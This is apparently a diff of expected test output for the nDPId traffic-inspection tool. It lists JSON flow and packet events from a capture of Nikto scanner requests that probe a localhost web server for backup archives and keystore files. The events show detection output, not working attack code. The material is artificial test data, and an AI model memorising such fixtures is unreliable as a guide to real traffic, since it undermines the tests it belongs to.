-00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":299,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":299,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277153,"flow_last_seen":1576420277153,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420277153,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50142,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":299,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":299,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277153,"flow_last_seen":1576420277153,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420277153,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50142,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":300,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":300,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277155,"flow_last_seen":1576420277155,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420277155,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50144,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":300,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":300,"flow_packet_id":1,"flow_last_seen":1576420277155,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"ts_msec":1576420277155,"pkt":"AAAAAAAAAAAAAAAACABFAADCDytAAEAGLQl\/AAABfwAAAcPgH5C7IzeiGEGCK4AYAED+tgAAAQEICp1m\/MudZvzLR0VUIC8xMjcwMDEuYWx6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="}
-00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":300,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":300,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277155,"flow_last_seen":1576420277155,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420277155,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50144,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":300,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":300,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277155,"flow_last_seen":1576420277155,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420277155,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50144,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":301,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":301,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277157,"flow_last_seen":1576420277157,"flow_idle_time":7440000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"ts_msec":1576420277157,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50146,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":301,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":301,"flow_packet_id":1,"flow_last_seen":1576420277157,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":215,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":215,"pkt_l4_len":181,"ts_msec":1576420277157,"pkt":"AAAAAAAAAAAAAAAACABFAADJ8y5AAEAGSP5\/AAABfwAAAcPiH5D9g8umqBgGFIAYAED+vQAAAQEICp1m\/M2dZvzNR0VUIC8xMjcuMC4wLjEudGFyLmJ6MiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
-00870{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":301,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":301,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277157,"flow_last_seen":1576420277157,"flow_idle_time":7440000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"ts_msec":1576420277157,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50146,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":301,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":301,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277157,"flow_last_seen":1576420277157,"flow_idle_time":7440000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"ts_msec":1576420277157,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50146,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":302,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":302,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277159,"flow_last_seen":1576420277159,"flow_idle_time":7440000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"ts_msec":1576420277159,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50148,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":302,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":302,"flow_packet_id":1,"flow_last_seen":1576420277159,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":215,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":215,"pkt_l4_len":181,"ts_msec":1576420277159,"pkt":"AAAAAAAAAAAAAAAACABFAADJ4mhAAEAGWcR\/AAABfwAAAcPkH5ACw9rweorXCIAYAED+vQAAAQEICp1m\/M+dZvzPR0VUIC8xMjcuMC4wLjEudGFyLmJ6MiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="}
-00870{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":302,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":302,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277159,"flow_last_seen":1576420277159,"flow_idle_time":7440000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"ts_msec":1576420277159,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50148,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":302,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":302,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277159,"flow_last_seen":1576420277159,"flow_idle_time":7440000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"ts_msec":1576420277159,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50148,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":303,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":303,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277160,"flow_last_seen":1576420277160,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420277160,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50150,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00655{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":303,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":303,"flow_packet_id":1,"flow_last_seen":1576420277160,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"ts_msec":1576420277160,"pkt":"AAAAAAAAAAAAAAAACABFAAC9m2BAAEAGoNh\/AAABfwAAAcPmH5DB5aPVANERlIAYAED+sQAAAQEICp1m\/NCdZvzQR0VUIC8xLnRhciBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
-00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":303,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":303,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277160,"flow_last_seen":1576420277160,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420277160,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50150,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01047{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":303,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":303,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277160,"flow_last_seen":1576420277160,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420277160,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50150,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":304,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":304,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277162,"flow_last_seen":1576420277162,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420277162,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50152,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00655{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":304,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":304,"flow_packet_id":1,"flow_last_seen":1576420277162,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"ts_msec":1576420277162,"pkt":"AAAAAAAAAAAAAAAACABFAAC9DilAAEAGLhB\/AAABfwAAAcPoH5AB6DautSQRQ4AYAED+sQAAAQEICp1m\/NKdZvzRR0VUIC8xLnRhciBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
-00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":304,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":304,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277162,"flow_last_seen":1576420277162,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420277162,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50152,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01047{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":304,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":304,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277162,"flow_last_seen":1576420277162,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420277162,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50152,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":305,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":305,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277164,"flow_last_seen":1576420277164,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420277164,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50154,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":305,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":305,"flow_packet_id":1,"flow_last_seen":1576420277164,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"ts_msec":1576420277164,"pkt":"AAAAAAAAAAAAAAAACABFAADFIABAAEAGHDF\/AAABfwAAAcPqH5Cuoid2XcqpP4AYAED+uQAAAQEICp1m\/NSdZvzTR0VUIC8xMjcwMC50YXIuYnoyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="}
-00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":305,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":305,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277164,"flow_last_seen":1576420277164,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420277164,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50154,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":305,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":305,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277164,"flow_last_seen":1576420277164,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420277164,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50154,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":306,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":306,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277165,"flow_last_seen":1576420277165,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420277165,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50156,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":306,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":306,"flow_packet_id":1,"flow_last_seen":1576420277165,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"ts_msec":1576420277165,"pkt":"AAAAAAAAAAAAAAAACABFAADFxNJAAEAGd15\/AAABfwAAAcPsH5ANevxccArVDoAYAED+uQAAAQEICp1m\/NWdZvzVR0VUIC8xMjcwMC50YXIuYnoyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="}
-00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":306,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":306,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277165,"flow_last_seen":1576420277165,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420277165,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50156,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":306,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":306,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277165,"flow_last_seen":1576420277165,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420277165,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50156,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":307,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":307,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277166,"flow_last_seen":1576420277166,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420277166,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50158,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00668{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":307,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":307,"flow_packet_id":1,"flow_last_seen":1576420277166,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"ts_msec":1576420277166,"pkt":"AAAAAAAAAAAAAAAACABFAADFbqBAAEAGzZB\/AAABfwAAAcPuH5Bs\/lYWJw4fzoAYAED+uQAAAQEICp1m\/NadZvzWR0VUIC8xMjcuMC4wLjEuamtzIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
